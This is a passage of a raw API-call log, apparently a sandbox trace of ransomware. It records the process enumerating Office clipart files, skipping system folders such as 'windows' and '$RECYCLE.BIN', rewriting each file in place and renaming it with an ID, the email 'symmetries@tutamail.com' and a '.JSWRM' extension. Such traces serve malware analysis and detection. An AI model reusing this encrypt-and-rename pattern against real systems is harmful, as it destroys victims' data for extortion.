(lpString1="J0105246.WMF", lpString2="...") returned 1 [0080.664] lstrcmpiW (lpString1="J0105246.WMF", lpString2="windows") returned -1 [0080.664] lstrcmpiW (lpString1="J0105246.WMF", lpString2="recovery") returned -1 [0080.664] lstrcmpiW (lpString1="J0105246.WMF", lpString2="perflogs") returned -1 [0080.664] lstrcmpiW (lpString1="J0105246.WMF", lpString2="documents and settings") returned 1 [0080.664] lstrcmpiW (lpString1="J0105246.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.664] lstrcmpiW (lpString1="J0105246.WMF", lpString2="system volume information") returned -1 [0080.664] lstrcmpiW (lpString1="J0105246.WMF", lpString2="msocache") returned -1 [0080.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0080.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105246.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105246.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105246.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0080.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0080.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105246.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105246.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105246.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0080.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0080.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0080.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0080.664] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105246.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105246.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.665] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=19328) returned 1 [0080.665] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4b80) returned 0x24d210 [0080.665] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4b80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4b80, lpOverlapped=0x0) returned 1 [0080.667] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.667] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4b80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4b80, lpOverlapped=0x0) returned 1 [0080.667] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.668] CloseHandle (hObject=0x314) returned 1 [0080.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0080.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0080.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0080.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0080.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0080.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0080.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0080.668] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0080.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0080.668] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0080.668] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105246.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105246.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105246.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105246.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0080.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0080.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0080.669] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe62b2d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe62b2d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe62b2d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1214, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105250.WMF", cAlternateFileName="")) returned 1 [0080.669] lstrcmpiW (lpString1="J0105250.WMF", lpString2=".") returned 1 [0080.669] lstrcmpiW (lpString1="J0105250.WMF", lpString2="..") returned 1 [0080.669] lstrcmpiW (lpString1="J0105250.WMF", lpString2="...") returned 1 [0080.669] lstrcmpiW (lpString1="J0105250.WMF", lpString2="windows") returned -1 [0080.669] lstrcmpiW (lpString1="J0105250.WMF", lpString2="recovery") returned -1 [0080.669] lstrcmpiW (lpString1="J0105250.WMF", lpString2="perflogs") returned -1 [0080.669] lstrcmpiW (lpString1="J0105250.WMF", lpString2="documents and settings") returned 1 [0080.669] lstrcmpiW (lpString1="J0105250.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.669] lstrcmpiW (lpString1="J0105250.WMF", lpString2="system volume information") returned -1 [0080.669] lstrcmpiW (lpString1="J0105250.WMF", lpString2="msocache") returned -1 [0080.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0080.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105250.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105250.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105250.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0080.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0080.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105250.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105250.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105250.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0080.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0080.669] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0080.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.669] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0080.670] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105250.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105250.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.670] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4628) returned 1 [0080.670] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.670] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1210) returned 0x205850 [0080.670] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1210, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1210, lpOverlapped=0x0) returned 1 [0080.672] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.672] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1210, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1210, lpOverlapped=0x0) returned 1 [0080.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0080.672] CloseHandle (hObject=0x314) returned 1 [0080.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0080.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0080.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0080.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0080.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0080.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0080.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0080.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0080.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0080.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0080.673] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105250.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105250.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105250.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105250.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0080.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0080.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0080.673] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe62b2d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe62b2d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe62b2d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1714, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105266.WMF", cAlternateFileName="")) returned 1 [0080.673] lstrcmpiW (lpString1="J0105266.WMF", lpString2=".") returned 1 [0080.673] lstrcmpiW (lpString1="J0105266.WMF", lpString2="..") returned 1 [0080.674] lstrcmpiW (lpString1="J0105266.WMF", lpString2="...") returned 1 [0080.674] lstrcmpiW (lpString1="J0105266.WMF", lpString2="windows") returned -1 [0080.674] lstrcmpiW (lpString1="J0105266.WMF", lpString2="recovery") returned -1 [0080.674] lstrcmpiW (lpString1="J0105266.WMF", lpString2="perflogs") returned -1 [0080.674] lstrcmpiW (lpString1="J0105266.WMF", lpString2="documents and settings") returned 1 [0080.674] lstrcmpiW (lpString1="J0105266.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.674] lstrcmpiW (lpString1="J0105266.WMF", lpString2="system volume information") returned -1 [0080.674] lstrcmpiW (lpString1="J0105266.WMF", lpString2="msocache") returned -1 [0080.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0080.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105266.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105266.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105266.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0080.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0080.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105266.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105266.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105266.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0080.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0080.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0080.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0080.674] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105266.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105266.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.720] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5908) returned 1 [0080.720] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1710) returned 0x205850 [0080.720] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1710, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1710, lpOverlapped=0x0) returned 1 [0080.722] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.722] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1710, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1710, lpOverlapped=0x0) returned 1 [0080.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0080.723] CloseHandle (hObject=0x314) returned 1 [0080.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0080.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0080.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0080.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0080.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0080.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0080.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0080.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0080.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0080.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0080.723] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105266.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105266.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105266.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105266.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0080.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0080.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0080.724] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe62b2d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe62b2d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe62b2d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4540, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105272.WMF", cAlternateFileName="")) returned 1 [0080.724] lstrcmpiW (lpString1="J0105272.WMF", lpString2=".") returned 1 [0080.724] lstrcmpiW (lpString1="J0105272.WMF", lpString2="..") returned 1 [0080.724] lstrcmpiW (lpString1="J0105272.WMF", lpString2="...") returned 1 [0080.724] lstrcmpiW (lpString1="J0105272.WMF", lpString2="windows") returned -1 [0080.724] lstrcmpiW (lpString1="J0105272.WMF", lpString2="recovery") returned -1 [0080.725] lstrcmpiW (lpString1="J0105272.WMF", lpString2="perflogs") returned -1 [0080.725] lstrcmpiW (lpString1="J0105272.WMF", lpString2="documents and settings") returned 1 [0080.725] lstrcmpiW (lpString1="J0105272.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.725] lstrcmpiW (lpString1="J0105272.WMF", lpString2="system volume information") returned -1 [0080.725] lstrcmpiW (lpString1="J0105272.WMF", lpString2="msocache") returned -1 [0080.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0080.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105272.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105272.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105272.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0080.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0080.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105272.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105272.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105272.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0080.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 